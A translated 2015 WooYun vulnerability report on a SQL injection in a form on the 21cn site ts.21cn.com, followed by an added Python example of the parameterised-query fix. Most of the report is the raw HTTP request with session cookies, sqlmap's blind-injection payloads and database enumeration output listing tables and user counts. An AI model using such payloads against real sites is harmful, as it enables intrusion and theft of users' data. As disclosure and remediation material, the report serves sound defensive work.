
SQL injection vulnerability in a form at 世纪龙

ID: 127189
URL: http://www.wooyun.org/bug.php?action=view&id=127189
Status: confirmed by vendor
Title: SQL injection vulnerability in a form at 世纪龙
Type: SQL injection
Vendor: 世纪龙信息网络有限责任公司
White hat: 路人甲
Submitted: 2015-07-16 15:47:00
Published: 2015-08-30 22:54:00
Fixed: (not set)
Confirmed: 2015-07-16 00:00:00
Confirm Spend: 0
Tags: MySQL injection techniques
Followers: 0
Bookmarks: 0
White hat rating:
White hat self-assessed rank: 16
Vendor rating:
Vendor rank: 15
Summary:
None
Details

POST /home/preview HTTP/1.1
Content-Length: 946
Content-Type: multipart/form-data; boundary=-----wooyunBoundary_DTQUTVUHKJ
X-Requested-With: XMLHttpRequest
Referer: http://ts.21cn.com/
Cookie: PHPSESSID=06f83672ea38aac0b7e54abeb038a20f; JSESSIONID=aaa9wVJf_6Gee7WcYBv6u
Host: ts.21cn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----wooyunBoundary_LFUYYLIYJS
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--

POC

sqlmap identified the following injection points with a total of 126 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
current user: None
current user is DBA: False
current user: '[email protected]'
current user is DBA: False
available databases [3]:
[*] information_schema
[*] jutousu
[*] test
Database: jutousu
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| iic_user | 82710 |
| iic_reply | 54781 |
| iic_log | 49619 |
| iic_digg | 46570 |
| iic_post_sync | 18118 |
| iic_user_addres | 17637 |
| iic_post | 15565 |
| iic_digg_20131224 | 13041 |
| iic_post_com | 12930 |
| iic_reply_sync | 6894 |
| iic_area | 3407 |
| iic_collective_digg | 2153 |
| iic_case | 941 |
| iic_access | 936 |
| iic_com | 764 |
| iic_wxuser | 750 |
| iic_recom | 731 |
| iic_collective_reply | 672 |
| iic_post_dealwith_satisfaction | 640 |
| iic_captcha | 531 |
| iic_merchant | 472 |
| iic_node | 278 |
| iic_movice | 188 |
| iic_redblackdigg | 100 |
| iic_ipadmin | 99 |
| iic_feedback | 95 |
| iic_collective | 93 |
| iic_postkeyword | 93 |
| iic_cat | 61 |
| iic_reply_link | 60 |
| iic_collectivetimeline | 59 |
| iic_collectivenews | 43 |
| iic_hotpost | 42 |
| iic_team | 42 |
| iic_article | 40 |
| iic_role_account | 36 |
| iic_account | 30 |
| iic_specialcolumn | 27 |
| iic_collectiveslide | 26 |
| iic_proc | 26 |
| iic_redblacklist | 25 |
| iic_keyword | 12 |
| iic_collectiveweibo | 11 |
| iic_admin | 8 |
| iic_role | 6 |
| iic_ip | 4 |
| iic_experttype | 3 |
| iic_arc | 2 |
| iic_wbsync | 2 |
| iic_filter | 1 |
+--------------------------------+---------+

Remediation

Fix it.
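The report's remediation section says only "fix it". As an added example that is not part of the report or the vendor's code: the boolean-based blind payload sqlmap found in pmerchantname works because the value is concatenated into a LIKE clause, and binding the pattern as a parameter (plus escaping user-typed wildcards) turns the same payload into plain text. sqlite3 stands in for the site's MySQL backend, and the table and column names are assumptions.

```python
import sqlite3

# Constructed sample rows; the table/column names are assumptions, not the site's schema.
SAMPLE_MERCHANTS = ["alpha shop", "beta store", 'a%") hack']

# Boolean-based blind payload sqlmap reported for pmerchantname (taken from the page).
PAYLOAD = "a%') AND 3901=3901 AND ('%'='"


def make_db():
    """In-memory sqlite3 database standing in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE iic_merchant (name TEXT)")
    conn.executemany("INSERT INTO iic_merchant VALUES (?)",
                     [(n,) for n in SAMPLE_MERCHANTS])
    return conn


def search_vulnerable(conn, merchant_name):
    """Concatenates the input into the LIKE pattern (the bug class on the page).
    The payload closes the quote and parenthesis, so its AND clause is evaluated
    by the database instead of being matched as text."""
    sql = ("SELECT name FROM iic_merchant "
           "WHERE (name LIKE '%" + merchant_name + "%')")
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, merchant_name):
    """Binds the whole pattern as a parameter, so quotes and parentheses in the
    input never reach the SQL parser; user-typed % and _ are escaped so they
    cannot widen the match either."""
    escaped = (merchant_name.replace("\\", "\\\\")
               .replace("%", "\\%")
               .replace("_", "\\_"))
    sql = "SELECT name FROM iic_merchant WHERE name LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]
```

With the payload, search_vulnerable returns every row (the injected condition is true), while search_fixed returns nothing because no merchant name literally contains that string.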

Status history:
2015-07-16: Details sent to the vendor; awaiting vendor handling
2015-07-16: Vendor confirmed; details disclosed to the vendor only
2015-07-26: Details disclosed to core white hats and domain experts
2015-08-05: Details disclosed to regular white hats
2015-08-15: Details disclosed to intern white hats
2015-08-30: Details disclosed to the public
Vendor reply: Thank you for your attention to the security of our services. Based on your report, the issue is being handled. Thanks.
Response: Severity: High; Vulnerability Rank: 15; Confirmed: 2015-07-16 22:53
Comments (content / commenter / likes / time):

Sorry, the vulnerability details were copied wrong; I have contacted WooYun to change them.

紫霞仙子 (0 likes), 2015-07-24 12:22:00

Sorry, the vulnerability details were copied wrong; I have contacted WooYun to fix them.

紫霞仙子 (0 likes), 2015-07-24 12:21:00